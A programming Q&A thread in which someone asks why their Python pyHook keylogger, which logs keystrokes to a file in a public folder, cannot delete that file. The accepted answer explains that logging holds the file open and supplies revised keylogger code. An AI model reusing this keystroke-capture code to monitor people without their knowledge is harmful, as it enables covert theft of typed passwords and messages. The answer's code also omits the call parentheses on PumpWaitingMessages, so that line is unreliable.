# File handling in Python: being used by another process

Tags: python, debugging, python-3.x, logging, file-handling

Well i made this script that its supouse to logg some keystrokes for a while save them in a file and then erase the file if the user want to however when the script tryes to delete the file i get this error.

> Traceback (most recent call last):File
>   "C:\Users\Tormentor\Desktop\S.D.A.K.L\pregunta.py", line 34, in
>   os.remove(path2+"\"+name) PermissionError: [WinError 32] The
>   process cannot access the file because it is being used by another
>   process:'C:\Users\Public\myfile.txt'

I made some research and i think that it cant be deleted because my "snp" function never closes the file where the keystrokes are logged so how can i close the file to delete it? 
Thanks for your help :).

```
import os
import time
import pyHook, pythoncom, sys, logging

path="C:\\Users\\Public\\myfile.txt"

path2="C:\\Users\\Public"

name="myfile.txt"

TinM=10

def snp(event):    #<---------- Not closing file ???
    global path
    logging.basicConfig(filename=path, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True


timeout=time.time()+TinM
while timeout > time.time():
    hooks_manager = pyHook.HookManager()
    hooks_manager.KeyDown = snp
    hooks_manager.HookKeyboard()
    print("Logging keystrokes")
    pythoncom.PumpWaitingMessages()
else:
    hooks_manager.UnhookKeyboard()
    x=input("Keylogger stoped do you want to delete the archive? y / n")
    if x == "y":
        for(path2,dirs,files) in os.walk(path2):
            if name in files:
                os.remove(path2+"\\"+name) # <----- This line triggers the error.
                print("Archive deleted. Goodbye")
            else:
                print("Archive does not exist or cant be found goodbye! :D")
    else:
        print("Goodbye! :D")
```

Comment: maybe that text file is already open some place else, like your text editor?

Comment: I have cheked and thats not the problem u.u .

Comment: Are you running the script in multiple consoles?

Answer (score 1, accepted):

The file is being held open by your own process.

```
logging.basicConfig(filename=path, level=logging.DEBUG...
```

opens the file specified by `filename`. It does not close it until the process exits, or `logging.shutdown()` is called, so you could call `shutdown()` in your `snp()` function.

However, that requires that logging be initialised every time that a key is pressed, which is very inefficient. A better design would be to call `logging.basicConfig()` *once* in the main part of your script, and to call `logging.shutdown()` prior to removing the file. Your `snp()` function then becomes:

```
def snp(event):
    logging.log(logging.DEBUG, chr(event.Ascii))
    return True
```

and the main part of the script:

```
logging.basicConfig(filename=path, level=logging.DEBUG, format='%(message)s')
timeout=time.time()+TinM
while timeout > time.time():
    hooks_manager = pyHook.HookManager()
    hooks_manager.KeyDown = snp
    hooks_manager.HookKeyboard()
    print("Logging keystrokes")
    pythoncom.PumpWaitingMessages

hooks_manager.UnhookKeyboard()
logging.shutdown()
x=input("Keylogger stoped do you want to delete the archive? y / n")
if x == "y":
    for(path2,dirs,files) in os.walk(path2):
        if name in files:
            os.remove(path2+"\\"+name) # <----- This line triggers the error.
            print("Archive deleted. Goodbye")
        else:
            print("Archive does not exist or cant be found goodbye! :D")
else:
    print("Goodbye! :D")
```

Note that I also removed the `else` clause from the `while` statement because it is always executed for the code that you show.